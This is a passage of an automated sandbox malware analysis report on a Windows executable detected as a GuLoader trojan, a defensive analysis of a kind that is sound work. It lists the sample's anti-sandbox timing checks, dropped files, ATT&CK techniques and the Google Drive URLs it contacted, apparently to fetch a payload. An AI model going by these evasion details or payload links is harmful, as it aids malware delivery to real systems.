      Source: Yara matchFile source: 00000005.00000002.2943208218.0000000003404000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.3129745415.00000000021F4000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeCode function: 5_2_701A1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,5_2_701A1A98
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeCode function: 5_2_701A2F60 push eax; ret 5_2_701A2F8E
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeFile created: C:\Users\user\AppData\Local\Temp\nsa617D.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeAPI/Special instruction interceptor: Address: 371B13C
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeAPI/Special instruction interceptor: Address: 250B13C
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeRDTSC instruction interceptor: First address: 36F59AF second address: 36F59AF instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F4E9CD0389Ah 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeRDTSC instruction interceptor: First address: 24E59AF second address: 24E59AF instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F4E9CD3519Ah 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsa617D.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exe TID: 7772Thread sleep time: -40000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeCode function: 5_2_0040646B FindFirstFileA,FindClose,5_2_0040646B
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeCode function: 5_2_004027A1 FindFirstFileA,5_2_004027A1
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeCode function: 5_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,5_2_004058BF
      Source: eAvqHiIsgR.exe, 0000000D.00000003.2894763121.0000000003560000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2711247846.0000000003560000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.3021984973.0000000003560000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.3050205012.0000000003560000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000002.3133504347.0000000003560000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000002.3133413447.00000000034F8000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2739434894.0000000003560000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2866212879.0000000003560000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: eAvqHiIsgR.exe, 0000000D.00000003.2894763121.0000000003560000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2711247846.0000000003560000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.3021984973.0000000003560000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.3050205012.0000000003560000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000002.3133504347.0000000003560000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2739434894.0000000003560000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2866212879.0000000003560000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeAPI call chain: ExitProcess graph end nodegraph_5-4156
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeAPI call chain: ExitProcess graph end nodegraph_5-3981
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeCode function: 5_2_701A1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,5_2_701A1A98
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess created: C:\Users\user\Desktop\eAvqHiIsgR.exe "C:\Users\user\Desktop\eAvqHiIsgR.exe"Jump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeCode function: 5_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_00403348
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Native API
      1
      DLL Side-Loading
      1
      Access Token Manipulation
      11
      Masquerading
      OS Credential Dumping21
      Security Software Discovery
      Remote Services1
      Archive Collected Data
      11
      Encrypted Channel
      Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
      Process Injection
      1
      Virtualization/Sandbox Evasion
      LSASS Memory1
      Virtualization/Sandbox Evasion
      Remote Desktop Protocol1
      Clipboard Data
      3
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      DLL Side-Loading
      1
      Access Token Manipulation
      Security Account Manager2
      File and Directory Discovery
      SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
      Process Injection
      NTDS23
      System Information Discovery
      Distributed Component Object ModelInput Capture14
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information
      LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading
      Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      eAvqHiIsgR.exe61%ReversingLabsWin32.Trojan.Guloader
      eAvqHiIsgR.exe100%AviraTR/Injector.csnhe
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nsa617D.tmp\System.dll0%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://drive.userconte0%Avira URL Cloudsafe
      https://drive.usercontent.googl0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      drive.google.com
      172.217.19.174
      truefalse
        high
        drive.usercontent.google.com
        142.250.181.129
        truefalse
          high
          NameSourceMaliciousAntivirus DetectionReputation
          https://www.google.comeAvqHiIsgR.exe, 0000000D.00000003.3050147519.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.3021938003.0000000003565000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2555295504.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2866212879.000000000354E000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2739342404.000000000356C000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdeAvqHiIsgR.exe, 0000000D.00000001.2286991291.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
              high
              http://nsis.sf.net/NSIS_ErroreAvqHiIsgR.exefalse
                high
                https://drive.usercontent.google.com/download?ieAvqHiIsgR.exe, 0000000D.00000003.3021938003.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2894713568.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2866164241.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000002.3133620456.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.3050147519.000000000356C000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://translate.google.com/translate_a/element.jseAvqHiIsgR.exe, 0000000D.00000003.3050147519.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.3021938003.0000000003565000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2555295504.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2739342404.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2866212879.0000000003560000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYeAvqHiIsgR.exe, 0000000D.00000003.3021984973.0000000003560000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://drive.google.com/eAvqHiIsgR.exe, 0000000D.00000003.2739342404.000000000356C000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214eAvqHiIsgR.exe, 0000000D.00000001.2286991291.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                          high
                          https://drive.google.com/PeAvqHiIsgR.exe, 0000000D.00000002.3133413447.00000000034F8000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdeAvqHiIsgR.exe, 0000000D.00000001.2286991291.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                              high
                              https://drive.google.com/-45cd-abca-deddda976288eAvqHiIsgR.exe, 0000000D.00000002.3133413447.00000000034F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://www.ftp.ftp://ftp.gopher.eAvqHiIsgR.exe, 0000000D.00000001.2286991291.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                                  high
                                  https://drive.usercontent.google.com/eAvqHiIsgR.exe, 0000000D.00000003.2739342404.000000000356C000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://apis.google.comeAvqHiIsgR.exe, 0000000D.00000003.3050147519.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.3021938003.0000000003565000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2555295504.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2866212879.000000000354E000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2739342404.000000000356C000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://nsis.sf.net/NSIS_ErrorErroreAvqHiIsgR.exefalse
                                        high
                                        https://drive.userconteeAvqHiIsgR.exe, 0000000D.00000003.3021938003.000000000356C000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://drive.google.com/geAvqHiIsgR.exe, 0000000D.00000003.2894713568.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2866164241.000000000356C000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://drive.goeAvqHiIsgR.exe, 0000000D.00000003.3021938003.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2894713568.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2866164241.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000002.3133620456.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.3050147519.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2739342404.000000000356C000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://drive.usercontent.googleAvqHiIsgR.exe, 0000000D.00000003.3021938003.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2710930928.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2894713568.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2866164241.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000002.3133620456.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.3050147519.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2739342404.000000000356C000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            142.250.181.129
                                            drive.usercontent.google.comUnited States
                                            15169GOOGLEUSfalse
                                            172.217.19.174
                                            drive.google.comUnited States
                                            15169GOOGLEUSfalse
                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1567591
                                            Start date and time:2024-12-03 17:30:55 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 7m 9s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Run name:Run with higher sleep bypass
                                            Number of analysed new started processes analysed:17
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
